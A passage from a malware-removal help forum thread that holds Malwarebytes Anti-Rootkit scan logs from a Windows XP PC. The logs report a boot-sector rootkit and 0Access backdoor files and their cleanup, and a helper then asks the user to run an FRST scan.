\SystemRoot\system32\DRIVERS\raspptp.sys
\SystemRoot\system32\DRIVERS\TDI.SYS
\SystemRoot\system32\DRIVERS\psched.sys
\SystemRoot\system32\DRIVERS\msgpc.sys
\SystemRoot\system32\DRIVERS\ptilink.sys
\SystemRoot\system32\DRIVERS\raspti.sys
\SystemRoot\system32\DRIVERS\termdd.sys
\SystemRoot\system32\DRIVERS\kbdclass.sys
\SystemRoot\system32\DRIVERS\swenum.sys
\SystemRoot\system32\DRIVERS\update.sys
\SystemRoot\system32\DRIVERS\mssmbios.sys
\SystemRoot\System32\Drivers\NDProxy.SYS
\SystemRoot\system32\DRIVERS\usbhub.sys
\SystemRoot\system32\DRIVERS\NVENETFD.sys
\SystemRoot\system32\drivers\RtkHDAud.sys
\SystemRoot\system32\drivers\portcls.sys
\SystemRoot\system32\drivers\drmk.sys
\SystemRoot\System32\Drivers\i2omgmt.SYS
\SystemRoot\System32\Drivers\Fs_Rec.SYS
\SystemRoot\System32\Drivers\Null.SYS
\SystemRoot\System32\Drivers\Beep.SYS
\SystemRoot\system32\DRIVERS\i8042prt.sys
\SystemRoot\system32\DRIVERS\HIDPARSE.SYS
\SystemRoot\System32\drivers\vga.sys
\SystemRoot\System32\Drivers\mnmdd.SYS
\SystemRoot\System32\DRIVERS\RDPCDD.sys
\SystemRoot\System32\Drivers\Msfs.SYS
\SystemRoot\System32\Drivers\Npfs.SYS
\SystemRoot\system32\DRIVERS\rasacd.sys
\SystemRoot\system32\DRIVERS\ipsec.sys
\SystemRoot\system32\DRIVERS\tcpip.sys
\SystemRoot\system32\DRIVERS\netbt.sys
\SystemRoot\System32\drivers\afd.sys
\SystemRoot\system32\DRIVERS\netbios.sys
\SystemRoot\system32\DRIVERS\rdbss.sys
\SystemRoot\system32\DRIVERS\mrxsmb.sys
\SystemRoot\System32\Drivers\Fips.SYS
\SystemRoot\system32\DRIVERS\ipnat.sys
\SystemRoot\system32\DRIVERS\wanarp.sys
\SystemRoot\system32\DRIVERS\usbccgp.sys
\SystemRoot\system32\DRIVERS\USBSTOR.SYS
\SystemRoot\system32\DRIVERS\hidusb.sys
\SystemRoot\system32\DRIVERS\HIDCLASS.SYS
\SystemRoot\system32\DRIVERS\kbdhid.sys
\SystemRoot\system32\DRIVERS\mouhid.sys
\SystemRoot\System32\Drivers\Cdfs.SYS
\SystemRoot\System32\Drivers\dump_atapi.sys
\SystemRoot\System32\Drivers\dump_WMILIB.SYS
\SystemRoot\System32\win32k.sys
\SystemRoot\System32\drivers\Dxapi.sys
\SystemRoot\System32\watchdog.sys
\SystemRoot\System32\drivers\dxg.sys
\SystemRoot\System32\drivers\dxgthk.sys
\SystemRoot\System32\nv4_disp.dll
\SystemRoot\System32\ATMFD.DLL
\SystemRoot\system32\DRIVERS\ndisuio.sys
\SystemRoot\system32\drivers\wdmaud.sys
\SystemRoot\system32\drivers\sysaudio.sys
\SystemRoot\system32\DRIVERS\mrxdav.sys
\??\C:\WINDOWS\system32\drivers\int15.sys
\SystemRoot\system32\DRIVERS\srv.sys
\SystemRoot\system32\drivers\npf.sys
\??\C:\Program Files\Free Ride Games\X4HS32Ex.Sys
\SystemRoot\System32\Drivers\HTTP.sys
\SystemRoot\system32\DRIVERS\sr.sys
\??\C:\DOCUME~1\BUDDYH~1\LOCALS~1\Temp\aswMBR.sys
\??\c:\Documents and Settings\All Users\Application Data\Microsoft\Microsoft Antimalware\Definition Updates\{5EEF60F5-22C5-471C-900A-286C4260DD8F}\MpKsl986fd788.sys
\SystemRoot\system32\drivers\kmixer.sys
\??\C:\WINDOWS\system32\drivers\mbamchameleon.sys
\??\C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys
\WINDOWS\system32\ntdll.dll
----------- End -----------
Done!
<<<1>>>
Upper Device Name: \Device\Harddisk2\DR5
Upper Device Object: 0xffffffff85124120
Upper Device Driver Name: \Driver\Disk\
Lower Device Name: \Device\00000071\
Lower Device Object: 0xffffffff85250030
Lower Device Driver Name: \Driver\USBSTOR\
<<<1>>>
Upper Device Name: \Device\Harddisk1\DR4
Upper Device Object: 0xffffffff84e9e2d0
Upper Device Driver Name: \Driver\Disk\
Lower Device Name: \Device\00000070\
Lower Device Object: 0xffffffff84ed9d08
Lower Device Driver Name: \Driver\USBSTOR\
<<<1>>>
Upper Device Name: \Device\Harddisk0\DR0
Upper Device Object: 0xffffffff851eeab8
Upper Device Driver Name: \Driver\Disk\
Lower Device Name: \Device\Ide\IdeDeviceP4T0L0-12\
Lower Device Object: 0xffffffff85236940
Lower Device Driver Name: \Driver\atapi\
<<<2>>>
Physical Sector Size: 512
Drive: 0, DevicePointer: 0xffffffff851eeab8, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
--------- Disk Stack ------
DevicePointer: 0xffffffff85237900, DeviceName: Unknown, DriverName: \Driver\PartMgr\
DevicePointer: 0xffffffff851eeab8, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
DevicePointer: 0xffffffff852ba318, DeviceName: \Device\00000064\, DriverName: \Driver\ACPI\
DevicePointer: 0xffffffff85236940, DeviceName: \Device\Ide\IdeDeviceP4T0L0-12\, DriverName: \Driver\atapi\
------------ End ----------
Alternate DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
Upper DeviceData: 0x0, 0x0, 0x0
Lower DeviceData: 0x0, 0x0, 0x0
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
<<<2>>>
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
Scanning drivers directory: C:\WINDOWS\SYSTEM32\drivers...
<<<2>>>
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
Done!
Drive 0
Scanning MBR on drive 0...
Inspecting partition table:
MBR Signature: 55AA
Disk Signature: C9C06833

Partition information:

    Partition 0 type is Other (0x12)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 2048  Numsec = 20971520

    Partition 1 type is Primary (0x7)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 20973568  Numsec = 291587072

    Partition 2 type is HIDDEN (0x17)
    Partition is ACTIVE.
    Partition starts at LBA: 312560640  Numsec = 21152
    Partition is not bootable
Infected: VBR on Hidden active partition --> [unknown.Rootkit.VBR]
Physical drive 0 is not bootable
Bootable physical drive, other than a system drive has been found

    Partition 2 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0

    Partition 3 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0

MBR infection found on drive 0
Disk Size: 160041885696 bytes
Sector size: 512 bytes

Scanning physical sectors of unpartitioned space on drive 0 (1-2047-312561808-312581808)...
Done!
Physical Sector Size: 0
Drive: 1, DevicePointer: 0xffffffff84e9e2d0, DeviceName: \Device\Harddisk1\DR4\, DriverName: \Driver\Disk\
--------- Disk Stack ------
DevicePointer: 0xffffffff85030718, DeviceName: Unknown, DriverName: \Driver\PartMgr\
DevicePointer: 0xffffffff84e9e2d0, DeviceName: \Device\Harddisk1\DR4\, DriverName: \Driver\Disk\
DevicePointer: 0xffffffff84ed9d08, DeviceName: \Device\00000070\, DriverName: \Driver\USBSTOR\
------------ End ----------
Physical Sector Size: 0
Drive: 2, DevicePointer: 0xffffffff85124120, DeviceName: \Device\Harddisk2\DR5\, DriverName: \Driver\Disk\
--------- Disk Stack ------
DevicePointer: 0xffffffff85250b78, DeviceName: Unknown, DriverName: \Driver\PartMgr\
DevicePointer: 0xffffffff85124120, DeviceName: \Device\Harddisk2\DR5\, DriverName: \Driver\Disk\
DevicePointer: 0xffffffff85250030, DeviceName: \Device\00000071\, DriverName: \Driver\USBSTOR\
------------ End ----------
Infected: C:\WINDOWS\system32\c_68825.nls --> [backdoor.0Access]
Read File: File "c:\windows\$ntuninstallkb877$\395111198\@" is compressed (flags = 1)
Read File: File "c:\windows\$ntuninstallkb877$\395111198\loader.tlb" is compressed (flags = 1)
Read File: File "c:\windows\$ntuninstallkb877$\395111198\l\aatagjfo" is compressed (flags = 1)
Infected: c:\windows\$ntuninstallkb877$\395111198\l\aatagjfo --> [backdoor.0Access]
Read File: File "c:\windows\$ntuninstallkb877$\395111198\u\@00000001" is compressed (flags = 1)
Infected: c:\windows\$ntuninstallkb877$\395111198\u\@00000001 --> [backdoor.0Access]
Read File: File "c:\windows\$ntuninstallkb877$\395111198\u\@000000c0" is compressed (flags = 1)
Infected: c:\windows\$ntuninstallkb877$\395111198\u\@000000c0 --> [backdoor.0Access]
Read File: File "c:\windows\$ntuninstallkb877$\395111198\u\@000000cb" is compressed (flags = 1)
Infected: c:\windows\$ntuninstallkb877$\395111198\u\@000000cb --> [backdoor.0Access]
Read File: File "c:\windows\$ntuninstallkb877$\395111198\u\@000000cf" is compressed (flags = 1)
Infected: c:\windows\$ntuninstallkb877$\395111198\u\@000000cf --> [backdoor.0Access]
Read File: File "c:\windows\$ntuninstallkb877$\395111198\u\@80000000" is compressed (flags = 1)
Infected: c:\windows\$ntuninstallkb877$\395111198\u\@80000000 --> [backdoor.0Access]
Read File: File "c:\windows\$ntuninstallkb877$\395111198\u\@800000c0" is compressed (flags = 1)
Infected: c:\windows\$ntuninstallkb877$\395111198\u\@800000c0 --> [backdoor.0Access]
Read File: File "c:\windows\$ntuninstallkb877$\395111198\u\@800000cb" is compressed (flags = 1)
Infected: c:\windows\$ntuninstallkb877$\395111198\u\@800000cb --> [backdoor.0Access]
Read File: File "c:\windows\$ntuninstallkb877$\395111198\u\@800000cf" is compressed (flags = 1)
Infected: c:\windows\$ntuninstallkb877$\395111198\u\@800000cf --> [backdoor.0Access]
Infected: c:\windows\$ntuninstallkb877$\2860961191 --> [backdoor.0Access]
Infected: c:\windows\$ntuninstallkb877$\395111198 --> [backdoor.0Access]
Infected: c:\windows\$ntuninstallkb877$\395111198\@ --> [backdoor.0Access]
Infected: c:\windows\$ntuninstallkb877$\395111198\loader.tlb --> [backdoor.0Access]
Infected: c:\windows\$ntuninstallkb877$\395111198\l --> [backdoor.0Access]
Infected: c:\windows\$ntuninstallkb877$\395111198\u --> [backdoor.0Access]
Scan finished
Creating System Restore point...
Cleaning up...
<<<2>>>
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
<<<2>>>
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
Executing an action fixdamage.exe...
Success!
Queuing an action fixdamage.exe
Removal scheduling successful. System shutdown needed.
System shutdown occurred
=======================================


---------------------------------------
Malwarebytes Anti-Rootkit BETA 1.07.0.1009

© Malwarebytes Corporation 2011-2012

OS version: 5.1.2600 Windows XP Service Pack 3 x86

Account is Administrative

Internet Explorer version: 8.0.6001.18702

Java version: 1.6.0_37

File system is: NTFS
Disk drives: C:\ DRIVE_FIXED
CPU speed: 1.607000 GHz
Memory total: 937865216, free: 344899584

Initializing...
=======================================
------------ Kernel report ------------
     03/20/2014 17:48:32
------------ Loaded modules -----------
\WINDOWS\system32\ntkrnlpa.exe
\WINDOWS\system32\hal.dll
\WINDOWS\system32\KDCOM.DLL
\WINDOWS\system32\BOOTVID.dll
imofugc.sys
ACPI.sys
\WINDOWS\system32\DRIVERS\WMILIB.SYS
pci.sys
isapnp.sys
pciide.sys
\WINDOWS\system32\DRIVERS\PCIIDEX.SYS
MountMgr.sys
ftdisk.sys
PartMgr.sys
VolSnap.sys
atapi.sys
disk.sys
\WINDOWS\system32\DRIVERS\CLASSPNP.SYS
fltMgr.sys
sr.sys
MpFilter.sys
KSecDD.sys
WudfPf.sys
Ntfs.sys
NDIS.sys
Mup.sys
\SystemRoot\system32\DRIVERS\AmdPPM.sys
\SystemRoot\system32\DRIVERS\wmiacpi.sys
\SystemRoot\system32\DRIVERS\mouclass.sys
\SystemRoot\system32\DRIVERS\usbohci.sys
\SystemRoot\system32\DRIVERS\USBPORT.SYS
\SystemRoot\system32\DRIVERS\usbehci.sys
\SystemRoot\system32\DRIVERS\HDAudBus.sys
\SystemRoot\system32\DRIVERS\nvnetbus.sys
\SystemRoot\system32\DRIVERS\NVNRM.SYS
\SystemRoot\system32\DRIVERS\imapi.sys
\SystemRoot\system32\drivers\pfc.sys
\SystemRoot\system32\DRIVERS\cdrom.sys
\SystemRoot\system32\DRIVERS\redbook.sys
\SystemRoot\system32\DRIVERS\ks.sys
\SystemRoot\system32\DRIVERS\AGRSM.sys
\SystemRoot\system32\DRIVERS\USBD.SYS
\SystemRoot\System32\Drivers\Modem.SYS
\SystemRoot\system32\DRIVERS\nv4_mini.sys
\SystemRoot\system32\DRIVERS\VIDEOPRT.SYS
\SystemRoot\system32\DRIVERS\clwvd.sys
\SystemRoot\system32\DRIVERS\audstub.sys
\SystemRoot\system32\DRIVERS\rasl2tp.sys
\SystemRoot\system32\DRIVERS\ndistapi.sys
\SystemRoot\system32\DRIVERS\ndiswan.sys
\SystemRoot\system32\DRIVERS\raspppoe.sys
\SystemRoot\system32\DRIVERS\raspptp.sys
\SystemRoot\system32\DRIVERS\TDI.SYS
\SystemRoot\system32\DRIVERS\psched.sys
\SystemRoot\system32\DRIVERS\msgpc.sys
\SystemRoot\system32\DRIVERS\ptilink.sys
\SystemRoot\system32\DRIVERS\raspti.sys
\SystemRoot\system32\DRIVERS\termdd.sys
\SystemRoot\system32\DRIVERS\kbdclass.sys
\SystemRoot\system32\DRIVERS\swenum.sys
\SystemRoot\system32\DRIVERS\update.sys
\SystemRoot\system32\DRIVERS\mssmbios.sys
\SystemRoot\System32\Drivers\NDProxy.SYS
\SystemRoot\system32\DRIVERS\usbhub.sys
\SystemRoot\system32\DRIVERS\NVENETFD.sys
\SystemRoot\system32\drivers\RtkHDAud.sys
\SystemRoot\system32\drivers\portcls.sys
\SystemRoot\system32\drivers\drmk.sys
\SystemRoot\System32\Drivers\i2omgmt.SYS
\SystemRoot\system32\DRIVERS\usbccgp.sys
\SystemRoot\system32\DRIVERS\USBSTOR.SYS
\SystemRoot\System32\Drivers\Fs_Rec.SYS
\SystemRoot\System32\Drivers\Null.SYS
\SystemRoot\System32\Drivers\Beep.SYS
\SystemRoot\system32\DRIVERS\i8042prt.sys
\SystemRoot\system32\DRIVERS\hidusb.sys
\SystemRoot\system32\DRIVERS\HIDCLASS.SYS
\SystemRoot\system32\DRIVERS\HIDPARSE.SYS
\SystemRoot\System32\drivers\vga.sys
\SystemRoot\System32\Drivers\mnmdd.SYS
\SystemRoot\System32\DRIVERS\RDPCDD.sys
\SystemRoot\System32\Drivers\Msfs.SYS
\SystemRoot\System32\Drivers\Npfs.SYS
\SystemRoot\system32\DRIVERS\rasacd.sys
\SystemRoot\system32\DRIVERS\ipsec.sys
\SystemRoot\system32\DRIVERS\tcpip.sys
\SystemRoot\system32\DRIVERS\netbt.sys
\SystemRoot\System32\drivers\afd.sys
\SystemRoot\system32\DRIVERS\netbios.sys
\SystemRoot\system32\DRIVERS\rdbss.sys
\SystemRoot\system32\DRIVERS\mrxsmb.sys
\SystemRoot\System32\Drivers\Fips.SYS
\SystemRoot\system32\DRIVERS\ipnat.sys
\SystemRoot\system32\DRIVERS\wanarp.sys
\SystemRoot\system32\DRIVERS\kbdhid.sys
\SystemRoot\system32\DRIVERS\mouhid.sys
\SystemRoot\System32\Drivers\Cdfs.SYS
\SystemRoot\System32\Drivers\dump_atapi.sys
\SystemRoot\System32\Drivers\dump_WMILIB.SYS
\SystemRoot\System32\win32k.sys
\SystemRoot\System32\drivers\Dxapi.sys
\SystemRoot\System32\watchdog.sys
\SystemRoot\System32\drivers\dxg.sys
\SystemRoot\System32\drivers\dxgthk.sys
\SystemRoot\System32\nv4_disp.dll
\SystemRoot\System32\ATMFD.DLL
\SystemRoot\system32\DRIVERS\ndisuio.sys
\SystemRoot\system32\drivers\wdmaud.sys
\SystemRoot\system32\drivers\sysaudio.sys
\SystemRoot\system32\DRIVERS\mrxdav.sys
\??\C:\WINDOWS\system32\drivers\int15.sys
\SystemRoot\system32\DRIVERS\srv.sys
\SystemRoot\system32\drivers\npf.sys
\??\C:\Program Files\Free Ride Games\X4HS32Ex.Sys
\??\c:\Documents and Settings\All Users\Application Data\Microsoft\Microsoft Antimalware\Definition Updates\{5EEF60F5-22C5-471C-900A-286C4260DD8F}\MpKsl4d344a32.sys
\SystemRoot\System32\Drivers\HTTP.sys
\??\C:\WINDOWS\system32\drivers\mbamchameleon.sys
\SystemRoot\system32\drivers\kmixer.sys
\??\C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys
\WINDOWS\system32\ntdll.dll
----------- End -----------
Done!
<<<1>>>
Upper Device Name: \Device\Harddisk2\DR4
Upper Device Object: 0xffffffff83c0e030
Upper Device Driver Name: \Driver\Disk\
Lower Device Name: \Device\00000070\
Lower Device Object: 0xffffffff84f39128
Lower Device Driver Name: \Driver\USBSTOR\
<<<1>>>
Upper Device Name: \Device\Harddisk1\DR3
Upper Device Object: 0xffffffff84f71030
Upper Device Driver Name: \Driver\Disk\
Lower Device Name: \Device\0000006f\
Lower Device Object: 0xffffffff84dec030
Lower Device Driver Name: \Driver\USBSTOR\
<<<1>>>
Upper Device Name: \Device\Harddisk0\DR0
Upper Device Object: 0xffffffff8528bab8
Upper Device Driver Name: \Driver\Disk\
Lower Device Name: \Device\Ide\IdeDeviceP4T0L0-12\
Lower Device Object: 0xffffffff8528c940
Lower Device Driver Name: \Driver\atapi\
<<<2>>>
Physical Sector Size: 512
Drive: 0, DevicePointer: 0xffffffff8528bab8, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
--------- Disk Stack ------
DevicePointer: 0xffffffff85280900, DeviceName: Unknown, DriverName: \Driver\PartMgr\
DevicePointer: 0xffffffff8528bab8, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
DevicePointer: 0xffffffff852f4658, DeviceName: \Device\00000063\, DriverName: \Driver\ACPI\
DevicePointer: 0xffffffff8528c940, DeviceName: \Device\Ide\IdeDeviceP4T0L0-12\, DriverName: \Driver\atapi\
------------ End ----------
Alternate DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
Upper DeviceData: 0x0, 0x0, 0x0
Lower DeviceData: 0x0, 0x0, 0x0
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
<<<2>>>
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
Scanning drivers directory: C:\WINDOWS\SYSTEM32\drivers...
<<<2>>>
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
Done!
Drive 0
Scanning MBR on drive 0...
Inspecting partition table:
MBR Signature: 55AA
Disk Signature: C9C06833

Partition information:

    Partition 0 type is Other (0x12)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 2048  Numsec = 20971520

    Partition 1 type is Primary (0x7)
    Partition is ACTIVE.
    Partition starts at LBA: 20973568  Numsec = 291587072
    Partition is not bootable

    Partition 2 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0

    Partition 3 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0

Disk Size: 160041885696 bytes
Sector size: 512 bytes

Scanning physical sectors of unpartitioned space on drive 0 (1-2047-312561808-312581808)...
Done!
Physical Sector Size: 0
Drive: 1, DevicePointer: 0xffffffff84f71030, DeviceName: \Device\Harddisk1\DR3\, DriverName: \Driver\Disk\
--------- Disk Stack ------
DevicePointer: 0xffffffff84d74020, DeviceName: Unknown, DriverName: \Driver\PartMgr\
DevicePointer: 0xffffffff84f71030, DeviceName: \Device\Harddisk1\DR3\, DriverName: \Driver\Disk\
DevicePointer: 0xffffffff84dec030, DeviceName: \Device\0000006f\, DriverName: \Driver\USBSTOR\
------------ End ----------
Physical Sector Size: 0
Drive: 2, DevicePointer: 0xffffffff83c0e030, DeviceName: \Device\Harddisk2\DR4\, DriverName: \Driver\Disk\
--------- Disk Stack ------
DevicePointer: 0xffffffff85163020, DeviceName: Unknown, DriverName: \Driver\PartMgr\
DevicePointer: 0xffffffff83c0e030, DeviceName: \Device\Harddisk2\DR4\, DriverName: \Driver\Disk\
DevicePointer: 0xffffffff84f39128, DeviceName: \Device\00000070\, DriverName: \Driver\USBSTOR\
------------ End ----------
Scan finished
 

Link to post
Share on other sites

Scan with FRST in normal mode

Please download Farbar's Recovery Scan Tool to your desktop: FRST 32bit or FRST 64bit (If not sure: Start --> Computer (right click) --> properties)

  • Run FRST.
  • Don´t change one of the checkboxes and hit Scan.
  • Logfiles are created on your desktop.
  • Poste the FRST.txt and (after the first scan only!) the Addition.txt.

Link to post
Share on other sites

Guest
This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.

Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.